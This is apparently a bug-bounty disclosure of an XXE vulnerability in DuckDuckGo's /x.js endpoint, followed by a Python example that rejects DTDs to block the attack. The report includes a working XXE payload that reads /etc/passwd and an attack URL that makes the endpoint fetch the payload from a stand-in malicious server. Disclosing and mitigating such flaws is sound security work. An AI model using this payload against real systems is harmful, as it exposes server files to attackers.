XXE on https://duckduckgo.com
Discovered by mik317 on Duckduckgo

This issue took 0 Days and 0 hours to triage and 0 Days and 12 hours to resolve once triaged.

Summary: Hi DuckDuckGo team, I'm not sure of this vulnerability, but I'd like to try my luck. The https://duckduckgo.com domain is vulnerable to an XXE injection in the /x.js endpoint, in the ?u parameter. This resource simply fetches an XML-formatted file and then returns an output. The problem is that there isn't any control over the XML input, and the output can return the result of some parsed XML entities.

Steps:

  1. Attacker uploads a file with the following content to his malicious server (reachable remotely):

     <?xml version="1.0" encoding="ISO-8859-1"?>
     <!DOCTYPE foo [ <!ELEMENT foo ANY >
     <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
     <creds>
         <user>&xxe;</user>
         <pass>mypass</pass>
     </creds>

  2. Now, with the file uploaded to his server, he goes to https://duckduckgo.com/x.js?u=http://malicious_server/xxe.xml
  3. The parsed result of the file includes the entity with the content of /etc/passwd {F410529}

I'm not sure that the execution occurs inside the machine and not only in a sandbox; anyway, I want to try my luck :)

Impact

XXE injection, LFI, probably RCE
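As an added example (not code from the report or from DuckDuckGo), the mitigation a fetch-and-parse endpoint like the one described needs: refuse any DTD before handing untrusted XML to a parser, since without a DOCTYPE no SYSTEM entity can be declared. The sample documents, the function names and the "user" field are constructed assumptions for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a document of the same shape as the report's payload,
# an external entity declared in an inline DTD and referenced from content.
XXE_DOC = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>"""

# Constructed sample: a plain document without a DTD, which should be accepted.
PLAIN_DOC = """<?xml version="1.0"?>
<creds><user>alice</user><pass>mypass</pass></creds>"""

_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class UnsafeXmlError(ValueError):
    """Raised when an untrusted document carries a DTD."""


def has_doctype(data: bytes) -> bool:
    """True if the raw document declares a DOCTYPE (and so may declare entities)."""
    return _DOCTYPE_RE.search(data) is not None


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML fetched from a user-supplied URL, rejecting any DTD up front.

    Rejecting DOCTYPE entirely rules out external (SYSTEM) entities, so neither
    local file disclosure nor entity-driven fetches to other hosts can occur,
    and entity-expansion bombs are excluded as well.
    """
    if has_doctype(data):
        raise UnsafeXmlError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(data)


def user_field(data: bytes) -> str:
    """Return the <user> text of an accepted document (assumed field name)."""
    return parse_untrusted_xml(data).findtext("user", default="")


def demo() -> dict:
    """Run both samples through the hardened path and report the outcome."""
    results = {}
    for name, doc in (("xxe", XXE_DOC), ("plain", PLAIN_DOC)):
        try:
            results[name] = user_field(doc.encode("iso-8859-1"))
        except UnsafeXmlError as exc:
            results[name] = f"rejected: {exc}"
    return results
```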